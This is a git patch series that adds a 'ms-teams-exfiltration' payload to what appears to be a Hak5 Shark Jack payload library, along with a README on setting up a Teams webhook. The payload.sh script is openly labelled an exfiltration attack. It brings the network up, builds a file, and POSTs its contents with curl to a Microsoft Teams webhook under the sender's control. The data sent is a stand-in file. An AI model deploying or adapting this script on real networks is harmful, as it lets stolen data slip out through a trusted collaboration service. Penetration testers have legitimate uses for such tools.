From 842dfa90cd28fa50af9c5115770302e3bcfd87c1 Mon Sep 17 00:00:00 2001 From: jboz Date: Wed, 19 Jan 2022 19:46:23 +0100 Subject: [PATCH 1/3] add exfiltration payload work with ms teams --- .../example/ms-teams-exfiltration/README.md | 7 +++ .../example/ms-teams-exfiltration/payload.sh | 48 +++++++++++++++++++ 2 files changed, 55 insertions(+) create mode 100644 payloads/library/example/ms-teams-exfiltration/README.md create mode 100644 payloads/library/example/ms-teams-exfiltration/payload.sh diff --git a/payloads/library/example/ms-teams-exfiltration/README.md b/payloads/library/example/ms-teams-exfiltration/README.md new file mode 100644 index 0000000..3f401c6 --- /dev/null +++ b/payloads/library/example/ms-teams-exfiltration/README.md @@ -0,0 +1,7 @@ +- Install following packages : ``` curl ``` +- Refer to this payload to install package https://github.com/julesbozouklian/shark_jack_payload/blob/main/payload/util/install_package.sh +- Or SSH to the Shark jack and use following command : ``` opkg install curl ``` + +- Create a Teams canal +- Add the application Incoming Webhook +- Get your WebHook URL diff --git a/payloads/library/example/ms-teams-exfiltration/payload.sh b/payloads/library/example/ms-teams-exfiltration/payload.sh new file mode 100644 index 0000000..984983f --- /dev/null +++ b/payloads/library/example/ms-teams-exfiltration/payload.sh @@ -0,0 +1,48 @@ +#!/bin/sh +# Title: Ms Teams +# Description: Exfiltrate data with microsoft teams + +# Author: Jules Bozouklian - bozou_client +# Version: 1.0 +# Category: Exfiltrate +# +# LED SETUP (Magenta)... Setting logs and waiting for IP address from DHCP +# LED ATTACK (Yellow)... Send message +# + +LOG_DIR=/root/loot/exfiltrate/ms-teams +TIMESTAMP=`date +"%Y-%m-%d"` + +WEB_HOOK_URL="" + + +LED SETUP + +NETMODE DHCP_CLIENT + +# Make log file +mkdir -p $LOG_DIR +LOG_FILE=$TIMESTAMP"_$(find $LOG_DIR -type f | wc -l).log" +LOG="$LOG_DIR/$LOG_FILE" + +# Wait until Shark Jack has an IP address +while [ -z "$IPADDR" ]; do sleep 1 && IPADDR=$(ifconfig eth0 | grep "inet addr"); done + +LED ATTACK + +# create a fake file to send +touch /root/test-file.txt +echo "Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 19:12 CET +Nmap scan report for scanme.nmap.org (45.33.32.156) +Host is up (0.15s latency). +Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f +Not shown: 995 closed tcp ports (conn-refused)" >> /root/test-file.txt + + +function sendToMsTeams() { + curl -H 'Content-Type: application/json' -X POST -d "{'text': '$(printf '%s' $(cat /root/test-file.txt))'}" $WEB_HOOK_URL +} + +sendToMsTeams + +LED FINISH From b7048f1da6d932d740b91d213c4d51ba2c9e6fb4 Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Wed, 19 Jan 2022 13:20:34 -0600 Subject: [PATCH 2/3] Rename payloads/library/example/ms-teams-exfiltration/README.md to payloads/library/exfiltration/ms-teams-exfiltration/README.md --- .../{example => exfiltration}/ms-teams-exfiltration/README.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/library/{example => exfiltration}/ms-teams-exfiltration/README.md (100%) diff --git a/payloads/library/example/ms-teams-exfiltration/README.md b/payloads/library/exfiltration/ms-teams-exfiltration/README.md similarity index 100% rename from payloads/library/example/ms-teams-exfiltration/README.md rename to payloads/library/exfiltration/ms-teams-exfiltration/README.md From 7114f3a702c7397230a8205dd8af373058cf5303 Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Wed, 19 Jan 2022 13:21:51 -0600 Subject: [PATCH 3/3] Rename payloads/library/example/ms-teams-exfiltration/payload.sh to payloads/library/exfiltration/ms-teams-exfiltration/payload.sh --- .../{example => exfiltration}/ms-teams-exfiltration/payload.sh | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/library/{example => exfiltration}/ms-teams-exfiltration/payload.sh (100%) diff --git a/payloads/library/example/ms-teams-exfiltration/payload.sh b/payloads/library/exfiltration/ms-teams-exfiltration/payload.sh similarity index 100% rename from payloads/library/example/ms-teams-exfiltration/payload.sh rename to payloads/library/exfiltration/ms-teams-exfiltration/payload.sh